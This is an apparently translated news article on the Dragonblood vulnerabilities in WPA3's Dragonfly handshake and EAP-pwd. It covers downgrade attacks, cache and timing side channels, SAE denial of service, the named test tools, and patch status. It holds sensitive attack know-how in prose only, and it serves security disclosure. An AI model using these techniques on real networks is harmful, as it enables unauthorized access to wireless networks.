Mathy Vanhoef, author of the KRACK attack on WPA2 wireless networks, and Eyal Ronen, co-author of several attacks on TLS, disclosed six vulnerabilities (CVE-2019-9494 - CVE-2019-9499) in the technology protection of WPA3 wireless networks, allowing you to recreate the connection password and gain access to the wireless network without knowing the password. The vulnerabilities are grouped under the code name Dragonblood and allow compromise of Dragonfly's connection negotiation method, which provides protection against offline password guessing. In addition to WPA3, the Dragonfly method is also used to protect against dictionary guessing in the EAP-pwd protocol used by Android, RADIUS servers, and hostapd/wpa_supplicant.
The study identified two main types of architectural problems in WPA3. Both types of problems can eventually be used to recreate an access password. The first type allows you to perform a fallback to unreliable cryptographic methods (downgrade attack): means to ensure compatibility with WPA2 (transit mode that allows the use of WPA2 and WPA3) allows an attacker to force the client to perform the four-way connection negotiation used by WPA2, which allows further use of classic brute-force attacks passwords applicable to WPA2. In addition, the possibility of performing a downgrade attack directly on the Dragonfly connection matching method was revealed, which allows you to roll back to less secure types of elliptic curves.
The second type of problems leads to the leakage of information about the characteristics of the password through third-party channels and is based on flaws in the password encoding method in Dragonfly, which allows indirect data, such as changes in delays during operations, to recreate the original password. Dragonfly's hash to elliptic curve algorithm (hash-to-curve) is susceptible to attacks by tracking information settling in the processor cache (cache attack), and the hash-to-group algorithm is susceptible to attacks through execution time measurement operations (timing attack).
To carry out attacks through cache parsing, an attacker must be able to execute unprivileged code on the system of a user connecting to a wireless network. Both methods make it possible to obtain the information necessary to clarify the correctness of the choice of parts of the password in the process of its selection. The effectiveness of the attack is quite high and allows you to guess an 8-character password that includes lowercase characters, intercepting only 40 connection negotiation sessions (handshake) and spending resources equivalent to renting Amazon EC2 capacity for $125.
Based on the identified vulnerabilities, several attack scenarios have been proposed:
- Rollback attack on WPA2 with the ability to conduct dictionary selection. In circumstances where the client and access point support both WPA3 and WPA2, an attacker can deploy their own rogue access point with the same network name that only supports WPA2. In such a situation, the client will use the WPA2-specific connection negotiation method, during which the inadmissibility of such a rollback will be determined, but this will be done at the stage when the channel negotiation messages have been sent and all the information necessary for a dictionary attack has already been leaked. A similar technique can be used to fallback to problematic versions of elliptic curves in SAE.
In addition, the iwd daemon, developed by Intel as an alternative to wpa_supplicant, and the Samsung Galaxy S10 wireless stack have been found to be downgrade-attacked even on WPA3-only networks - if these devices have previously connected to a WPA3 network, they will try to connect to dummy WPA2 network of the same name.
- Attack through third-party channels with the extraction of information from the processor cache. The password encoding algorithm in Dragonfly contains conditional branching, and the attacker, being able to execute the code on the wireless network user's system, can determine which one of the if-then-else expression blocks is selected based on the analysis of the cache behavior. The information obtained can be used to perform progressive password guessing using methods similar to offline dictionary attacks to guess WPA2 passwords. For protection, it is proposed to switch to the use of operations with a constant execution time that does not depend on the nature of the data being processed;
- Attack through third-party channels with an estimate of the time of operations. The Dragonfly code uses multiple multiplicative groups (MODPs) and a variable number of iterations to encode passwords, depending on the password used and the MAC address of the access point or client. A remote attacker can determine how many iterations were performed during password encoding and use them as a clue in progressive password guessing.
- Call denial of service. An attacker can block the operation of certain functions of the access point due to the exhaustion of available resources by sending a large number of requests for negotiating a communication channel. To bypass the flood protection provided in WPA3, it is enough to send requests from fictitious non-repeating MAC addresses.
- Fallback to less secure cryptographic groups used in the WPA3 connection negotiation process. For example, if a client supports P-521 and P-256 elliptic curves, and uses P-521 as a priority option, then an attacker, regardless of support
P-521 on the side of the access point, can force the client to use the P-256. The attack is carried out by filtering out some messages during the connection negotiation process and sending fake messages with information about the lack of support for certain types of elliptic curves.
To check devices for vulnerabilities, several scripts have been prepared with examples of attacks:
- Dragonslayer - implementation of attacks on EAP-pwd;
- Dragondrain is a utility for checking access point vulnerabilities in the implementation of the Simultaneous Authentication of Equals (SAE) connection negotiation method, which can be used to initiate a denial of service;
- Dragontime - a script for carrying out a third-party attack against SAE, taking into account the difference in the processing time of operations when using groups MODP 22, 23 and 24;
- Dragonforce is a utility for recovering information (password guessing) based on information about different processing times for operations or determining data settling in the cache.
The Wi-Fi Alliance, which develops standards for wireless networks, announced that the problem affects a limited number of early implementations of WPA3-Personal and can be fixed through a firmware and software update. The facts of the use of vulnerabilities to perform malicious actions have not yet been recorded. To improve security, the Wi-Fi Alliance has added additional tests to the wireless device certification program to verify the correct implementations, and has contacted device manufacturers to jointly coordinate the resolution of identified issues. Issue patches have already been released for hostap/wpa_supplicant. Package updates are available for Ubuntu. On Debian, RHEL, SUSE/openSUSE, Arch, Fedora, and FreeBSD, the issues are still unfixed.
Source: opennet.ru